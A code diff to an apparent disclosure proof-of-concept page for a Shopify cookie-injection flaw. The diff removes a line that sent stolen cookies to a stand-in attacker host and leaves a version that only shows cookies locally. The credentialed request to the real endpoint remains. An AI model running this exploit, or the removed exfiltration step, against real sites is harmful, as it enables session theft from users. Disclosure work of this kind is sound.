--- a/ex.html
+++ b/ex.html
@@ -4,7 +4,7 @@
 <h1>Shopify Cookie Injection PoC</h1>
 <script>
 (async () => {
-    // Step 1 — Trigger the vulnerable endpoint
+    // Step 1 — Trigger the vulnerable Shopify endpoint
     await fetch("https://accounts.shopify.com/.well-known/dux", {
         method: "POST",
         credentials: "include",
@@ -20,14 +20,11 @@
         })
     });
 
-    // Step 2 — Read cookies that Shopify just set for your domain
-    const stolenCookies = document.cookie;
+    // Step 2 — Read cookies set for your GitHub Pages domain
+    const cookies = document.cookie;
 
-    // Step 3 — Send them to your server for capture
-    fetch("https://evilshopifyattack.com/log?cookies=" + encodeURIComponent(stolenCookies));
-
-    // Step 4 — Display cookies locally for PoC
-    document.body.innerHTML = "<h2>Stolen Cookies:</h2><pre>" + stolenCookies + "</pre>";
+    // Step 3 — Show cookies on screen (safe PoC — no exfiltration)
+    document.body.innerHTML = "<h2>Cookies for this domain:</h2><pre>" + cookies + "</pre>";
 })();
 </script>
 </body>
